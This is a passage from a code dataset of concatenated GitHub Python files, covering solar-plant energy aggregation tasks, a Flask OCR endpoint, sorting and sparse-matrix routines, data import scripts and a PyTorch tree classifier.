reverse=True, key=lambda item: item[1]))\nprint(\"closeness\", a)\n# key=list(a.keys())\n# value=list(a.values())\n# fig, ax = plt.subplots()\n# # ax.fmt_ydata = millions\n# plt.plot(key, value, 'o')\n# plt.show()\n\n# configuration\n# degrees = []\n# degree_list = DG.degree(original_nodes)\n# for d in degree_list:\n# degrees.append(d[1])\n# print(degrees)\n# CM = nx.configuration_model(degrees, create_using=None, 
seed=None)\n# nx.draw(CM, with_labels=False)\n# plt.show()\n# print(\"nodes:\", len(list(CM.nodes)))\n# print(\"edges:\", len(list(CM.edges)))\n\n# erdos\n# ERG = nx.erdos_renyi_graph(len(list(DG.nodes)), 0.0385, seed=None, directed=False)\n# # nx.draw(ERG, with_labels=False)\n# # plt.show()\n# print(\"nodes:\", len(list(ERG.nodes)))\n# print(\"edges:\", len(list(ERG.edges)))\n\nclustering = nx.clustering(DG, nodes=None, weight=None)\na = dict(sorted(clustering.items(), reverse=True, key=lambda item: item[1]))\nprint(\"clustering\", a)\n\nprint(nx.transitivity(DG))\n","repo_name":"Hila97/socialNetworks","sub_path":"real_claim.py","file_name":"real_claim.py","file_ext":"py","file_size_in_byte":9594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"24883326147","text":"from __future__ import absolute_import\nfrom celery import shared_task\nimport logging\nimport traceback\nimport sys\nfrom django.conf import settings\nfrom django.db import connections\nimport datetime\nfrom dataglen.models import Sensor\nfrom isoweek import Week\nfrom solarrms.models import IndependentInverter, SolarPlant, PlantMetaSource\nfrom dataglen.models import ValidDataStorageByStream\nfrom solarrms.settings import INVERTER_VALID_LAST_ENTRY_MINUTES, INVERTER_POWER_FIELD, \\\n PLANT_POWER_STREAM, PLANT_ENERGY_STREAM, INVERTER_ENERGY_FIELD\n# DO NOT CHANGE THIS IMPORT!\nfrom kutbill.worker import *\nfrom monitoring.views import write_a_data_write_ttl\nfrom datetime import timedelta\nimport pytz\n\n\n# get a logger\nlogger = logging.getLogger('logger.tasks')\nlogger.setLevel(logging.DEBUG)\n\ndef write_logging_errors(func_name):\n logger.debug(\"%s,%s,%s\",\n func_name, traceback.format_exc(),\n repr(traceback.extract_stack()))\n\n\ndef compare_dates(offset_naive_dt, offset_aware_dt):\n return offset_naive_dt.replace(tzinfo=pytz.UTC, microsecond=0) == offset_aware_dt.astimezone(pytz.UTC).replace(microsecond=0)\n\ndef write_plant_energy(user_id, plant_metakey, ts, n_writes):\n #logger.debug(\",\".join([str(user_id), str(plant_metakey), str(ts), str(n_writes)]))\n unit_conversion = 1.0\n try:\n plant_meta = PlantMetaSource.objects.get(sourceKey=plant_metakey)\n #logger.debug(plant_meta)\n plant_slug = plant_meta.plant.slug\n #logger.debug(plant_slug)\n # DO THE POWER CALCULATIONS\n if plant_meta.sending_aggregated_power:\n unit = plant_meta.fields.filter(name=PLANT_POWER_STREAM)[0].streamDataUnit\n #logger.debug(unit)\n if unit:\n if unit.upper() == \"W\":\n unit_conversion = 1000.0\n elif unit.upper() == \"KW\":\n unit_conversion = 1.0\n else:\n unit_conversion = 1.0\n #logger.debug(\"power unit:\" + str(unit_conversion))\n try:\n power_value = ValidDataStorageByStream.objects.filter(source_key=plant_meta.sourceKey,\n stream_name=PLANT_POWER_STREAM,\n timestamp_in_data=ts)\n # assert that the last data write is same as this ts\n power_value = float(power_value[0].stream_value)/float(unit_conversion)\n except:\n return 0\n #logger.debug(power_value)\n # WRITE THE VALUES\n update_power(plant_slug, ts, power_value)\n #logger.debug(\"power_updated\")\n\n if plant_meta.sending_aggregated_energy:\n # DO THE ENERGY CALCULATIONS\n unit = plant_meta.fields.filter(name=PLANT_ENERGY_STREAM)[0].streamDataUnit\n if unit:\n if unit.upper() == \"WH\":\n unit_conversion = 1000.0\n elif unit.upper() == \"KWH\":\n unit_conversion = 1.0\n else:\n unit_conversion = 1.0\n\n #logger.debug(\"energy unit: \" + str(unit_conversion))\n try:\n energy_values = 
ValidDataStorageByStream.objects.filter(source_key=plant_meta.sourceKey,\n stream_name=PLANT_ENERGY_STREAM,\n timestamp_in_data__lte=ts).limit(2)\n # assert that the first timestamp is same as this data write\n assert(compare_dates(energy_values[0].timestamp_in_data,ts))\n # if the values are next to each other\n if energy_values[0].timestamp_in_data - energy_values[1].timestamp_in_data < datetime.timedelta(minutes=INVERTER_VALID_LAST_ENTRY_MINUTES):\n # since it's cumulative, it should be positive\n if (float(energy_values[0].stream_value) - float(energy_values[1].stream_value)) > 0:\n energy_value = float(float(energy_values[0].stream_value) - float(energy_values[1].stream_value))/float(unit_conversion)\n energy_today = float(energy_values[0].stream_value)\n else:\n return 0\n else:\n return 0\n except:\n return 0\n #logger.debug(energy_value)\n update_energy(str(user_id) + \"_\" + str(plant_slug), ts, energy_value, energy_today)\n #logger.debug(\"energy_updated\")\n except Sensor.DoesNotExist:\n return 0\n\ndef write_inverter_energy(user_id, source_key, ts, n_writes):\n logger.debug(\",\".join([str(user_id), str(source_key), str(ts), str(n_writes), \"write_inverter_energy\"]))\n unit_conversion = 1.0\n try:\n inverter = IndependentInverter.objects.get(sourceKey=source_key)\n try:\n if hasattr(inverter.plant, 'gateway'):\n if inverter.plant.gateway.isVirtual:\n write_a_data_write_ttl(inverter.plant.owner.organization_user.user_id,\n inverter.plant.gateway.sourceKey,\n inverter.plant.gateway.timeoutInterval,\n True,\n timezone.now())\n except Exception as exc:\n logger.debug(exc)\n pass\n plant_slug = inverter.plant.slug\n unit = inverter.fields.filter(name=INVERTER_POWER_FIELD)[0].streamDataUnit\n if unit:\n if unit.upper() == \"W\":\n unit_conversion = 1000.0\n elif unit.upper() == \"KW\":\n unit_conversion = 1.0\n else:\n unit_conversion = 1.0\n except IndependentInverter.DoesNotExist:\n return 0\n\n try:\n #raise ValidDataStorageByStream.DoesNotExist\n daily_yield = ValidDataStorageByStream.objects.filter(source_key=source_key,\n stream_name=INVERTER_ENERGY_FIELD,\n timestamp_in_data__lte=ts).limit(2)\n if len(daily_yield) == 0:\n # it's a dumb inverter\n logger.debug(\"daily_yield == 0 no such data\")\n raise ValidDataStorageByStream.DoesNotExist\n\n if len(daily_yield) >= 1:\n # update the power in all cases if there's no cluster controller\n if hasattr(inverter.plant, 'metadata'):\n if inverter.plant.metadata.sending_aggregated_power is False:\n logger.debug(\"writing power for this inverter\")\n # update power values for this inverter, nothing can be done for energy yet\n write_entries = ValidDataStorageByStream.objects.filter(source_key=source_key,\n stream_name=INVERTER_POWER_FIELD,\n timestamp_in_data=ts).values_list('timestamp_in_data', 'stream_value')\n if len(write_entries) == 0:\n logger.debug(\"write_entries==0\")\n elif n_writes == 1:\n update_power(plant_slug, ts, float(write_entries[0][1])/float(unit_conversion))\n elif n_writes > 1:\n logger.debug(\"this should not be happening since we are not sending aggregated data yet\")\n\n # assert that the first timestamp in the data is same as of this data write\n assert(compare_dates(daily_yield[0].timestamp_in_data, ts))\n if len(daily_yield) == 2:\n # update energy if the data records are greater than 1 (i.e. 
the energy can be calculated)\n # and there is no cluster controller\n # it's an intelligent inverter\n if daily_yield[0].timestamp_in_data - daily_yield[1].timestamp_in_data > \\\n datetime.timedelta(minutes=INVERTER_VALID_LAST_ENTRY_MINUTES):\n return 0\n\n #logger.debug(\"intelligent inverter\")\n if float(daily_yield[1].stream_value) > 100000 or float(daily_yield[0].stream_value) > 100000:\n # TODO relate it to the plant capacity\n #logger.debug(\"abnormal value\")\n return 0\n #logger.debug(float(daily_yield[0].stream_value))\n #logger.debug(float(daily_yield[1].stream_value))\n\n energy = float(float(daily_yield[0].stream_value) - float(daily_yield[1].stream_value))\n if energy < 0 :\n #logger.debug(\"day change?\")\n return 0\n # update it for both plant and inverter\n energy_unit = inverter.fields.filter(name=INVERTER_ENERGY_FIELD)[0].streamDataUnit\n energy_unit_conversion = 1.0\n if energy_unit:\n if energy_unit.upper() == \"WH\":\n energy_unit_conversion = 1000.0\n elif energy_unit.upper() == \"KWH\":\n energy_unit_conversion = 1.0\n # update for the inverter in any case\n update_energy(inverter.sourceKey, ts, energy/energy_unit_conversion, float(daily_yield[1].stream_value))\n if hasattr(inverter.plant, 'metadata'):\n if inverter.plant.metadata.sending_aggregated_energy is False:\n # update for teh plant also\n update_energy(str(user_id) + \"_\" + str(inverter.plant.slug), ts, energy/energy_unit_conversion)\n except Exception as exc:\n #logger.debug(str(exc))\n # there's no daily_yield data, dumb inverter\n #\n # DUMB INVERTER - not sending cumulative energy values\n #logger.debug(\"it's a dumb inverter\")\n try:\n # get all the active power values >= ts and limit by n_writes [essentially the data point at ts]\n write_entries = ValidDataStorageByStream.objects.filter(source_key=source_key,\n stream_name=INVERTER_POWER_FIELD,\n timestamp_in_data=ts).values_list('timestamp_in_data', 'stream_value')\n\n if len(write_entries) == 0:\n #logger.debug(\",\".join([\"returning\", str(len(write_entries))]))\n # nothing to be done, this should not be happening though\n return 0\n\n #logger.debug(\",\".join([\"write_entries\", str(len(write_entries))]))\n # get a value just before the first value in the array, to calculate energy\n last_entry = ValidDataStorageByStream.objects.filter(source_key=source_key,\n stream_name=INVERTER_POWER_FIELD,\n timestamp_in_data__lt=ts).limit(1).values_list('timestamp_in_data', 'stream_value')\n final_entries = []\n if len(last_entry) == 0:\n #logger.debug(\"last_entry==0\")\n if n_writes > 1:\n pass\n elif n_writes == 1:\n # there's no last valid entry\n # if we've received only a single write, return now\n if hasattr(inverter.plant, 'metadata'):\n if inverter.plant.metadata.sending_aggregated_power is False:\n update_power(plant_slug, ts, float(write_entries[0][1])/float(unit_conversion))\n return 0\n else:\n update_power(plant_slug, ts, float(write_entries[0][1])/float(unit_conversion))\n return 0\n else:\n final_entries.append(last_entry[0])\n\n #logger.debug(len(write_entries))\n for entry in write_entries:\n final_entries.append(entry)\n\n #logger.debug(len(final_entries))\n for i in range(0, len(final_entries) - 1):\n if final_entries[i+1][0] - final_entries[i][0] > datetime.timedelta(minutes=INVERTER_VALID_LAST_ENTRY_MINUTES):\n continue\n else:\n if float(final_entries[i+1][1]) < 0 or float(final_entries[i][1]) < 0:\n continue\n energy_mean = (float(final_entries[i+1][1]) + float(final_entries[i][1]))/(float(2)*unit_conversion)\n delta = 
final_entries[i+1][0] - final_entries[i][0]\n total_seconds = delta.total_seconds()\n energy = (energy_mean * total_seconds)/float(3600)\n if hasattr(inverter.plant, 'metadata'):\n if inverter.plant.metadata.sending_aggregated_energy is False:\n update_energy(inverter.sourceKey, ts, energy)\n update_energy(str(user_id) + \"_\" + str(inverter.plant.slug), ts, energy)\n else:\n update_energy(inverter.sourceKey, ts, energy)\n else:\n update_energy(inverter.sourceKey, ts, energy)\n update_energy(str(user_id) + \"_\" + str(inverter.plant.slug), ts, energy)\n\n # skip the first entry as that's an old value - we needed that for the computation of energy\n # but that should not be added again as power\n #logger.debug(\"updating power values\")\n for i in range(1, len(final_entries)):\n if hasattr(inverter.plant, 'metadata'):\n if inverter.plant.metadata.sending_aggregated_power is False:\n update_power(plant_slug, ts, float(write_entries[0][1])/float(unit_conversion))\n else:\n update_power(plant_slug, ts, float(write_entries[0][1])/float(unit_conversion))\n except Exception as exc:\n return 0\n\n@shared_task\ndef update_power(plant_slug, ts, power):\n #logger.debug(\",\".join([plant_slug, str(ts), str(power), \"update_power\"]))\n if power < 0:\n return\n try:\n timestamp = ts.replace(second=0, microsecond=0)\n session = connections['cassandra'].connection.session\n\n if session:\n get_power_statement = session.prepare(\"SELECT power from dataglen_data.plant_power_table WHERE plant_slug = ? AND ts = ?\")\n update_power_statement = session.prepare(\"UPDATE dataglen_data.plant_power_table SET power = ? WHERE plant_slug = ? AND ts = ?\")\n\n existing_power = session.execute(get_power_statement, [plant_slug,\n timestamp])\n\n if existing_power:\n existing_power_value = float(existing_power[0]['power'])\n updated_power = float(existing_power_value) + float(power)\n session.execute(update_power_statement, [updated_power,\n plant_slug,\n timestamp])\n else:\n session.execute(update_power_statement, [power,\n plant_slug,\n timestamp])\n return 0\n else:\n #logger.debug(\"Unable to get a new cassandra session in update power\")\n return 1\n except Exception as exc:\n #logger.debug(exc)\n write_logging_errors(sys._getframe().f_code.co_name)\n return 1\n\n@shared_task\ndef update_energy(identifier, ts, energy, energy_today=None):\n try:\n #logger.debug(\"starting timestamps-1\")\n if energy_today:\n logger.debug(\",\".join([identifier, str(ts), str(energy), str(energy_today), \"update_energy\"]))\n else:\n logger.debug(\",\".join([identifier, str(ts), str(energy), \"update_energy\"]))\n #logger.debug(\"starting timestamps0\")\n identifiers = [identifier]\n #logger.debug(\"starting timestamps1\")\n # let's use the monday of the week as the timestamp for weeks\n week_details = ts.isocalendar()\n #logger.debug(\"starting timestamps2\")\n week = Week(week_details[0], week_details[1])\n #logger.debug(\"starting timestamps3\")\n week_monday_date = week.monday()\n #logger.debug(\"starting timestamps4\")\n timestamps = [(settings.DATA_COUNT_PERIODS.FIVE_MINTUES, ts.replace(minute=ts.minute - ts.minute%5, second=0, microsecond=0)),\n (settings.DATA_COUNT_PERIODS.HOUR, ts.replace(minute=0, second=0, microsecond=0)),\n (settings.DATA_COUNT_PERIODS.DAILY, ts.replace(hour=0, minute=0, second=0, microsecond=0)),\n (settings.DATA_COUNT_PERIODS.WEEK, ts.replace(month=week_monday_date.month,\n day=week_monday_date.day, hour=0, minute=0,\n second=0, microsecond=0)),\n (settings.DATA_COUNT_PERIODS.MONTH, ts.replace(day=1, 
hour=0,\n minute=0, second=0, microsecond=0))]\n session = connections['cassandra'].connection.session\n\n if session:\n get_energy_statement = session.prepare(\"SELECT energy from dataglen_data.energy_generation_table WHERE timestamp_type = ? AND count_time_period = ? AND identifier = ? AND ts = ?\")\n update_energy_statement = session.prepare(\"UPDATE dataglen_data.energy_generation_table SET energy = ? WHERE timestamp_type = ? AND count_time_period = ? AND identifier = ? AND ts = ?\")\n #logger.debug(\"Statements prepared5\")\n for identifier in identifiers:\n for entry in timestamps:\n #logger.debug(identifier)\n #logger.debug(entry[0])\n #logger.debug(entry[1])\n existing_energy = session.execute(get_energy_statement, [settings.TIMESTAMP_TYPES.BASED_ON_REQUEST_ARRIVAL,\n entry[0],\n identifier,\n entry[1]])\n\n if existing_energy:\n existing_energy_value = float(existing_energy[0]['energy'])\n updated_energy = existing_energy_value + energy\n\n # if it's a daily energy log, check if we missed any points\n if energy_today and entry[0] == settings.DATA_COUNT_PERIODS.DAILY:\n if updated_energy != energy_today:\n updated_energy = energy_today\n\n\n # TODO fix the week values, we will probably need am offline job for that\n\n session.execute(update_energy_statement, [updated_energy,\n settings.TIMESTAMP_TYPES.BASED_ON_REQUEST_ARRIVAL,\n entry[0],\n identifier,\n entry[1]])\n else:\n session.execute(update_energy_statement, [energy,\n settings.TIMESTAMP_TYPES.BASED_ON_REQUEST_ARRIVAL,\n entry[0],\n identifier,\n entry[1]])\n return 0\n else:\n logger.debug(\"Unable to get a new cassandra session\")\n return 1\n except:\n write_logging_errors(sys._getframe().f_code.co_name)\n return 1","repo_name":"gokul-cloudside/kutbull-original-backup","sub_path":"solarrms/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":20243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"42138993063","text":"# Flask\nfrom flask import Flask, request, render_template, jsonify\n\n# Some utilites\nimport numpy as np\nimport cv2\nfrom helper.util import base64_to_pil, draw, np_to_base64, read_url_img\n\n# Declare a flask app\napp = Flask(__name__)\n\n# Models\nfrom dnn.main import text_ocr\n\nTEXT_LINE_SCORE=0.7## min prob thres for text line detection\nscale = 900##no care text.cfg height,width\nmaxScale = 1800\n\n@app.route('/', methods=['GET'])\ndef index():\n # Main page\n\n return render_template('index.html')\n \n@app.route('/predict', methods=['GET', 'POST'])\ndef predict():\n if request.method == 'POST':\n # Get the image/image_url from post request\n try:\n img = base64_to_pil(request.json)\n except:\n img = read_url_img(request.json)\n\n image = np.array(img)\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n data,boxes = text_ocr(image,scale,maxScale,TEXT_LINE_SCORE)\n res_image = draw(boxes,img) \n return jsonify(result=data, image=np_to_base64(np.array(res_image)))\n return None\n\nif __name__ == '__main__':\n # FOR LOCAL RUN DEPLOY\n # app.run(port=3000, debug=True)\n \n # FOR LOCAL RUN DOCKER\n app.run(host='0.0.0.0',port=5002, debug=False)\n \n # FOR DEPLOYMENT DOCKER\n # import os\n # port = int(os.environ.get('PORT', 5000))\n # app.run(host = '0.0.0.0', port = port)\n\n","repo_name":"suinaowawa/chinese-ocr-flask-deploy","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} 
+{"seq_id":"29690111360","text":"import constants\nfrom sklearn import decomposition\nfrom random import uniform, randrange\nimport re\nimport numpy as np\n\n\nclass FeatureSelect:\n def __init__(self, data, extra_fit=False):\n self.data = data\n self.matrix = data.as_matrix(x for x in data.columns if x not in constants.COLUMN_THRESHOLD)\n self.components = self.matrix\n self.features = None\n self.extra_fit = extra_fit\n\n def pca(self, no_components=2):\n self.features = decomposition.PCA(n_components=no_components)\n self.fit()\n\n def lda(self, no_topics=2):\n self.features = decomposition.LatentDirichletAllocation(n_topics=no_topics, learning_method='batch')\n self.fit()\n\n def ica(self):\n self.features = decomposition.FastICA()\n self.fit()\n\n def fit(self):\n if self.extra_fit:\n col = self.data.as_matrix(x for x in self.data.columns if x in constants.COLUMN_THRESHOLD and re.match(\"^[S-U].*\", x))\n for arr in col:\n if uniform(0, 1) > 0.81:\n arr[0] = randrange(1, 6)\n self.components = np.c_[self.features.fit(self.matrix).transform(self.matrix), col]\n else:\n self.components = self.features.fit(self.matrix).transform(self.matrix)\n","repo_name":"alexdevmotion/eeg-image-classifier","sub_path":"classes/featureselect.py","file_name":"featureselect.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"43644516036","text":"def heap_sort (vetor):\n tamanho = len(vetor)\n montar_heap(vetor,tamanho)\n while tamanho > 1:\n vetor[0],vetor[tamanho-1] = vetor[tamanho-1],vetor[0]\n tamanho -= 1\n max_heapify(vetor,0,tamanho)\n \ndef max_heapify (vetor,raiz,tam):\n maior = raiz\n\n esq = 2*raiz+1\n if esq < tam and vetor[esq] > vetor[maior]:\n maior = esq\n\n dir =2*raiz+2\n if dir < tam and vetor[dir] > vetor[maior]:\n maior = dir\n \n if maior != raiz:\n vetor[raiz],vetor[maior] = vetor[maior],vetor[raiz]\n max_heapify(vetor,maior,tam)\n \n\ndef montar_heap(vetor,tam):\n last = int((tam/2)-1)\n for i in range(last,-1,-1):\n max_heapify(vetor,i,tam) \n\n\nentrada = eval(input())\n\nwhile entrada != []:\n\n heap_sort(entrada)\n print(entrada)\n\n entrada = eval(input())","repo_name":"NinjaCompacto/Exercicios-de-Algoritmo-e-Estrutura-de-Dados-2","sub_path":"Ordenação/Heap Sort/Heap_Sort.py","file_name":"Heap_Sort.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2434947971","text":"import MySQLdb\nimport csv\nimport collections\n\nPATH = \"/Users/gaoyounan/Desktop/Summer Term/Data Management/a1/CSV files/\"\ndb = MySQLdb.connect(\"35.183.6.252\", \"myuser\", \"mypass\", \"busDB\", charset='utf8' )\ncursor = db.cursor()\nfiles=open(PATH+'trips.csv','rb')\nReader = csv.DictReader(files)\n\nli = []\nt = 0\nfor row in Reader:\n t = t+1\n #row = collections.OrderedDict(originalRow)\n row['bus_num'] = row['route_id'].split('-')[0]\n str_arr = row['trip_id'].split('-')\n row['day'] = str_arr[len(str_arr)-2]\n row['sequence'] = str_arr[len(str_arr) - 1]\n row['trip_identification'] = int(str_arr[0])\n\n qmarks = ', '.join(['%s'] * len(row))\n\n cols = ', '.join(row.keys())\n sql = \"INSERT INTO %s (%s) VALUES (%s)\" % ('trips', cols, qmarks)\n\n li.append(row.values())\n if t % 1000 == 0:\n cursor.executemany(sql, li)\n db.commit()\n li = []\n\nif len(li) != 0:\n cursor.executemany(sql, li)\n db.commit()\n\n\nfiles.close()\ndb.close()","repo_name":"gaoyounan123/DB_Assignment1","sub_path":"Import 
Data into MySQL/Trip.py","file_name":"Trip.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"41942278652","text":"#https://www.hackerrank.com/challenges/most-commons/problem\n\n# !/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\nif __name__ == '__main__':\n s = input()\n\n result = dict()\n for c in s:\n if c not in result:\n result[c] = 1\n else:\n result[c] += 1\n\n count = 3\n for val in sorted(set(result.values()), reverse=True):\n subresult = {k: v for k, v in result.items() if v == val}\n subresult = dict(sorted(subresult.items()))\n for k1, v1 in subresult.items():\n count -= 1\n if count <= -1:\n break\n print(k1, v1)\n","repo_name":"KrishnaRaam-HackerRank/Python","sub_path":"7.collections/company_logo.py","file_name":"company_logo.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"31605474921","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\n\r\n#Ellpack format\r\nA = np.array([[1,0,0,0,0],[0,0,2,0,3],[0,4,0,0,5],[0,0,6,0,0],[0,0,0,7,0],[0,0,0,0,8]])\r\nB = np.array([[1],[2],[3],[4],[5]])\r\n\r\ndef ellpack(matrix1, matrix2):\r\n rowNum = int(matrix1.shape[0])\r\n columnNum = int(matrix1.shape[1])\r\n count = np.array([], dtype = int)\r\n r = 0\r\n\r\n for i in range(rowNum):\r\n count = np.append(count, 0)\r\n for j in range(columnNum):\r\n if matrix1[i][j] != 0:\r\n count[i] += 1\r\n count = max(count)\r\n\r\n\r\n NonZerosEntries = [[0 for i in range(count)] for j in range(rowNum)]\r\n Column = [[-1 for i in range(count)] for j in range(rowNum)]\r\n Result = np.array([], dtype = int)\r\n\r\n\r\n for i in range(rowNum):\r\n c = 0\r\n for j in range(columnNum):\r\n if matrix1[i][j] != 0:\r\n NonZerosEntries[r][c] = matrix1[i][j]\r\n Column[r][c] = j\r\n c += 1\r\n r += 1\r\n\r\n\r\n #Ellpack kernel\r\n\r\n for i in range(rowNum):\r\n temp = 0\r\n for j in range(count):\r\n if Column[i][j] == -1:\r\n break\r\n else:\r\n temp += NonZerosEntries[i][j] * matrix2[Column[i][j]]\r\n Result = np.append(Result, temp)\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ellpack(A,B)\r\n print (\"Ellpack result is: \", Result)\r\n","repo_name":"zhengdianchuaichuai/SpMV","sub_path":"ellpack.py","file_name":"ellpack.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"40439303020","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 21 14:44:09 2019\n\n@author: mckaydjensen\n\"\"\"\n\nimport json\nimport os\nimport numpy as np\nimport pandas as pd\n\nFEATURES_LOC = 'twitter_data/features'\n\ndef main():\n states_dict = {}\n filenames = os.listdir(FEATURES_LOC)\n for f in filenames:\n print('Extracting predictions from \"{}\"...'.format(f))\n with open(FEATURES_LOC + '/' + f, 'r', encoding='utf-8') as fh:\n features = json.load(fh)\n for tweet in features:\n place = tweet['place']\n score = tweet['prediction']\n try:\n states_dict[place].append(score)\n except KeyError:\n states_dict[place] = [score]\n states = states_dict.keys()[0]\n means = [np.mean(states_dict[state]) for state in states]\n stdevs = [np.std(states_dict[state], ddof=1) for state in states]\n df = pd.DataFrame({'state': states, 'mean': means, 'stdev': stdevs})\n df.to_csv('datadatadatadata.csv')\n return 
df","repo_name":"quevivasbien/twitter-sexism","sub_path":"compile_probabilities.py","file_name":"compile_probabilities.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"14546057132","text":"import PySimpleGUI as sg\nimport comportement\n\ntest = comportement.moveAnt()\n\nlayout = [[sg.Text(\"Valeur de x : \"+ str(test.x) +\" . Et valeur de y : \"+ str(test.y))], [sg.Button(\"Close window\")]]\n\nwindow = sg.Window(\"test\", layout, margins=(300,150))\n\nwhile True:\n event, values = window.read()\n if event == \"Close window\" or event == sg.WIN_CLOSED:\n break\n\nwindow.close()","repo_name":"Alexandre-stoppini/fourmis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74712525494","text":"import bz2\nimport csv\nimport io\nimport json\n\n\ndef create_full_iterator(data):\n if isinstance(data, (list, tuple)):\n return identity_iterator\n\n if hasattr(data, 'name'):\n filename = data.name\n elif isinstance(data, bz2.BZ2File):\n filename = data._fp.name\n else:\n raise ValueError('This format is not supported')\n\n filename_parts = filename.split('.')\n if len(filename_parts) < 2:\n return jsonlines_file_iterator\n if 'jsonlines' in filename_parts[-2:]:\n return jsonlines_file_iterator\n if filename_parts[-1] == 'csv':\n return csv_file_iterator\n\n\ndef _move_pointer_to_start(data):\n try:\n file_types = (file, io.IOBase, bz2.BZ2File)\n except NameError:\n file_types = (io.IOBase, bz2.BZ2File,)\n if isinstance(data, file_types):\n data.seek(0, 0)\n\n\ndef jsonlines_file_iterator(data):\n decoder = json.JSONDecoder()\n _move_pointer_to_start(data)\n\n for obj in data:\n if isinstance(obj, bytes):\n obj = obj.decode('utf-8')\n obj = decoder.decode(obj)\n yield obj\n\ndef csv_file_iterator(data):\n _move_pointer_to_start(data)\n reader = csv.DictReader(data)\n for obj in reader:\n yield obj\n\ndef identity_iterator(data):\n for obj in data:\n yield obj\n","repo_name":"bashalex/datapot","sub_path":"datapot/iterators.py","file_name":"iterators.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"22"} +{"seq_id":"74544346295","text":"def celsius(valor):\n valor1=(valor*9/5)+32\n return f'o valor {valor} celsius convertido para fahrenheit é: {valor1}'\n\nprint(celsius(int(input(\"digite um valor inteiro \"))))\n\ndef repetir(valor,valor1):\n valor2= valor.count(valor1)\n return f'o {valor1} se repete: {valor2}'\n\nvalor=input('digite palavras separadas por espaço ')\nvalor1=input('digite a letra que quer saber a quantidade que se repete ')\nprint(repetir(valor,valor1))\n\ndef media(valor,valor1,valor2,valor3):\n valor4= (valor+valor1+valor2+valor3)/4\n \n return f'a media das 4 notas é: {valor4}'\nvalor=float(input('digite o 1º valor '))\nvalor1=float(input('digite o 2º valor '))\nvalor2=float(input('digite o 3º valor '))\nvalor3=float(input('digite o 4º valor '))\nprint(media(valor,valor1,valor2,valor3))\n\n\ndef maior():\n lista = []\n while True:\n n = int(input('Digite o número :'))\n b = input(\"deseja continuar [S/N] \").upper()\n lista.append(n)\n if b == 'N':\n break\n return f' numero maior:{max(lista)}\\n numero menor:{min(lista)}'\n \n \nprint(maior())\n\nimport math\n\ndef area(valor):\n valor1=math.pi*(valor*valor)\n return f'a area do circula é 
:{round(valor1,2)}'\n\nprint(area(12))\n\n ","repo_name":"hugoerico/aula14","sub_path":"felipe_exercicio45678.py","file_name":"felipe_exercicio45678.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26950696062","text":"import torch\nimport numpy as np\nimport copy\n\nimport torch.nn as nn\nfrom utils.globals import *\n\n\ninner_nodes = {}\nnode_dict = {}\nlabel2id = {}\ntree = None\n\n\nclass InferTree(nn.Module):\n def __init__(self, arch, num_classes, dim, criterion, lamb, device) -> None:\n super().__init__()\n self.num_classes = num_classes\n self.dim = dim\n self.criterion = criterion\n self.lamb = lamb\n self.device = device\n\n global tree, node_dict, label2id\n node_dict = get_value('node_dict')\n label2id = get_value('label2id')\n tree = get_value('tree')\n tree.prob = 1.\n tree.path_prob = 1.\n\n self.depth = 0\n if arch == 'cifar10':\n self.depth = 5\n elif arch == 'cifar100':\n self.depth = 10\n elif arch == 'tiny-imagenet':\n self.depth = 10\n elif arch == 'imagenet':\n self.depth = 13\n\n # if arch == 'cifar10':\n # self.depth = 12\n # elif arch == 'cifar100':\n # self.depth = 14\n # elif arch == 'tiny-imagenet':\n # self.depth = 13\n # elif arch == 'imagenet':\n # self.depth = 14\n\n for i in range(self.depth):\n inner_nodes[i+1] = []\n self.__build_tree()\n\n self.env_params = {}\n\n def __build_tree(self):\n def build(node, layer):\n node.set_weight(torch.rand(1, self.dim).to(self.device))\n node.set_layer(layer)\n layers = [\n # nn.Conv2d(self.dim, self.dim, kernel_size=1, stride=1, bias=False),\n nn.Linear(self.dim, node.num_child()+1)\n ]\n # add one extra class to represent a misclassification (needs to return to the parent node)?,\n\n node.set_subid(get_value('label2id'))\n classifier = nn.Sequential(*layers).to(self.device)\n node.set_classifier(classifier)\n inner_nodes[node.layer].append(node)\n\n for i in node.children.keys():\n build(node.children[i], layer+1)\n return 0\n\n node = tree\n if node.is_leaf() or node == None:\n # node error\n return None\n build(node, 1)\n return node\n\n def forward(self, x, labels):\n penalty = torch.tensor(0.0).to(self.device)\n out = torch.zeros([x.shape[0], self.num_classes+1], dtype=torch.float32).to(self.device)\n\n for l, nodes in inner_nodes.items():\n for node in nodes:\n if node.is_leaf():\n continue\n x_t = x + node.weight.expand_as(x)\n sub_output = node.classifier(x_t)\n prob = torch.softmax(sub_output, 